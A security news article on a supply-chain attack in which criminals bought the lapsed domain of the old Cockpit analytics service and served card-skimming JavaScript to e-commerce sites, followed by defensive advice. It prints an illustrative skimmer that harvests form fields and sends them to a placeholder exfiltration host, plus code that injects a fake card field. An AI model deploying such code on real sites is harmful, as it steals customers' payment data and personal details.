Credit card skimming – the long and winding road of supply chain failure


Researchers at application security company Jscrambler have just published a cautionary tale about supply chain attacks…

…that is also a powerful reminder of just how long attack chains can be.

Sadly, that’s long merely in terms of time, not long in terms of technical complexity or the number of links in the chain itself.

Eight years ago…

The high-level version of the story published by the researchers is simply told, and it goes like this:

  • In the early 2010s, a web analytics company called Cockpit offered a free web marketing and analytics service. Numerous e-commerce sites used this service by sourcing JavaScript code from Cockpit’s servers, thus incorporating third-party code into their own web pages as trusted content (a typical embedding looks something like the sketch after this list).
  • In December 2014, Cockpit shut down its service. Users were warned that the service would be going offline, and that any JavaScript code they imported from Cockpit would stop working.
  • In November 2021, cybercriminals bought up Cockpit’s old domain name. To what we can only assume was a mixture of surprise and delight, the crooks apparently found that at least 40 e-commerce sites still hadn’t updated their web pages to remove any links to Cockpit, and were still calling home and accepting any JavaScript code that was on offer.
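
For context, a third-party analytics tag of this sort is typically embedded with a few lines of JavaScript along the lines of the sketch below. The domain and filename are placeholders, not Cockpit’s real URLs; the point is simply that whatever the remote server chooses to return runs with the same authority as the site’s own code.

  // Hypothetical example of how an analytics "tag" is commonly embedded.
  // The domain and path are placeholders, not Cockpit's real URLs.
  (function () {
    var s = document.createElement("script");
    s.src = "https://analytics.example.com/tag.js"; // third-party code, fetched on every page view
    s.async = true;
    document.head.appendChild(s);
  })();
  // Whatever tag.js contains runs with full access to the page,
  // including any forms your customers fill in.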

You can see where this story is going.

Hapless former Cockpit users who had apparently not checked their logs properly (or perhaps even at all) since late 2014 therefore failed to notice that their web pages were still trying to load code that no longer worked.

We’re guessing that those businesses did notice they weren’t getting any more analytics data from Cockpit, but that because they were expecting the data feed to stop working, they assumed that the end of the data was the end of their cybersecurity concerns relating to the service and its domain name.

Injection and surveillance

According to Jscrambler, the crooks who took over the defunct domain, and who thus acquired a direct route to insert malware into any web pages that still trusted and used that now-revived domain…

…started doing exactly that, injecting unauthorised, malicious JavaScript into a wide range of e-commerce sites.

This enabled two major types of attack:

  • Inserting JavaScript code to monitor the content of input fields on predetermined web pages. Data in input, select and textarea fields (the sort of fields you would expect in a typical web form) was extracted, encoded and exfiltrated to a range of “call home” servers operated by the attackers.
  • Inserting additional fields into web forms on selected web pages. This trick, known as HTML injection, means that crooks can subvert pages that users already trust, believably luring users into entering personal data that those pages wouldn’t normally ask for, such as passwords, birthdays, phone numbers or payment card details.

With this pair of attack vectors at their disposal, the crooks could not only siphon off whatever you typed into a web form on a compromised web page, but also go after additional personally identifiable information (PII) that they wouldn’t normally be able to steal.
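
Purely as an illustration (this is not the code Jscrambler recovered, and the exfiltration URL and injected field name are invented for the example), the two techniques boil down to something like this:

  // Technique 1: harvest whatever the user has typed into the form.
  function harvestFields() {
    var stolen = {};
    document.querySelectorAll("input, select, textarea").forEach(function (el) {
      if (el.name) { stolen[el.name] = el.value; }
    });
    // Encode the data and "call home" to an attacker-controlled server.
    new Image().src = "https://exfil.example.net/collect?d=" +
      encodeURIComponent(btoa(JSON.stringify(stolen)));
  }

  // Technique 2 (HTML injection): add a field the page never asked for.
  function addBogusField(form) {
    var extra = document.createElement("input");
    extra.name = "card_cvv";             // invented field name for the example
    extra.placeholder = "Security code";
    form.appendChild(extra);
  }

  document.querySelectorAll("form").forEach(function (form) {
    addBogusField(form);
    form.addEventListener("submit", harvestFields);
  });

Real campaigns typically obfuscate every one of those steps, but the underlying idea is no more complicated than that.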

By deciding which JavaScript code to serve up based on the identity of the server that requested the code in the first place, the crooks were able to tailor their malware to attack different types of e-commerce site in different ways.

This sort of tailored response, which is easy to implement by looking at the Referer: header sent in the HTTP requests generated by your browser, also makes it hard for cybersecurity researchers to determine the full range of attack “payloads” that the criminals have up their sleeves.

After all, unless you know in advance the precise list of servers and URLs that the crooks are looking out for on their servers, you won’t be able to generate HTTP requests that shake loose all likely variants of the attack that the criminals have programmed into the system.
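
To make that concrete, here is a rough sketch of the kind of probing a researcher might try, assuming Node 18 or later (for the built-in fetch()) and a purely hypothetical list of candidate referring sites. Without the crooks’ real target list, a probe like this can only shake loose the variants you already know to ask about:

  // Sketch only: fetch the suspect script with different Referer headers
  // and compare what comes back. All domains below are placeholders.
  const SUSPECT_SCRIPT = "https://analytics.example.com/tag.js";
  const CANDIDATE_REFERERS = [
    "https://shop-one.example/checkout",
    "https://shop-two.example/cart",
  ];

  (async () => {
    for (const referer of CANDIDATE_REFERERS) {
      const res = await fetch(SUSPECT_SCRIPT, { headers: { Referer: referer } });
      const body = await res.text();
      // Differing sizes (or hashes) suggest the server is tailoring its payload.
      console.log(referer, res.status, body.length);
    }
  })();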

In case you’re wondering, the Referer: header gets its name from a mis-spelling of the English word “referrer” in the original internet standards document, and the incorrect spelling has stuck ever since.

What to do?

  • Review your web-based supply chain links. Anywhere that you rely on URLs provided by other people for data or code that you serve up as if it were your own, you need to check regularly and frequently that you can still trust them. Don’t wait for your own customers to complain that “something looks broken”. Firstly, that means you’re relying entirely on reactive cybersecurity measures. Secondly, there may not be anything obvious for customers themselves to notice and report.
  • Check your logs. If your own website makes use of embedded HTTP links that are no longer working, then something is clearly wrong. Either you shouldn’t have been trusting that link before, because it was the wrong one, or you shouldn’t be trusting it any more, because it’s not behaving as it used to. If you aren’t going to check your logs, why bother collecting them in the first place?
  • Perform test transactions regularly. Maintain a regular and frequent test procedure that realistically goes through the same online transaction sequences that you expect your customers to follow, and track all incoming and outgoing requests closely. This will help you to spot unexpected downloads (e.g. your test browser sucking in unknown JavaScript) and unexpected uploads (e.g. data being exfiltrated from the test browser to unusual destinations); see the sketch after this list.
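
That last point lends itself to automation. The sketch below assumes the Playwright browser automation library (npm install playwright) and an allow-list of hostnames that is entirely made up; the idea is simply to record every request made during a scripted checkout and flag anything that isn’t on your own list:

  // Sketch: run a test transaction and flag requests to unexpected hosts.
  const { chromium } = require("playwright");

  const ALLOWED_HOSTS = new Set([
    "www.yourshop.example",   // your own site (placeholder)
    "cdn.yourshop.example",   // your own CDN (placeholder)
  ]);

  (async () => {
    const browser = await chromium.launch();
    const page = await browser.newPage();

    // Log every outgoing request, including scripts pulled in by other scripts.
    page.on("request", (req) => {
      const host = new URL(req.url()).hostname;
      if (!ALLOWED_HOSTS.has(host)) {
        console.log("Unexpected " + req.resourceType() + " request to " + req.url());
      }
    });

    // Replace this with a realistic checkout sequence: browse, add to cart,
    // fill in the payment form with test data, and so on.
    await page.goto("https://www.yourshop.example/checkout");

    await browser.close();
  })();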

If you’re still sourcing JavaScript from a server that was retired eight years ago, especially if you’re using it in a service that handles PII or payment data, you’re not part of the solution, you’re part of the problem…

…so, please, don’t be that person!


Note for Sophos customers. The “revitalised” web domain used here for JavaScript injection (web-cockpit DOT jp, if you want to search your own logs) is blocked by Sophos as PROD_SPYWARE_AND_MALWARE and SEC_MALWARE_REPOSITORY. This denotes that the domain is known not only to be associated with malware-related cybercriminality, but also to be involved in actively serving up malware code.

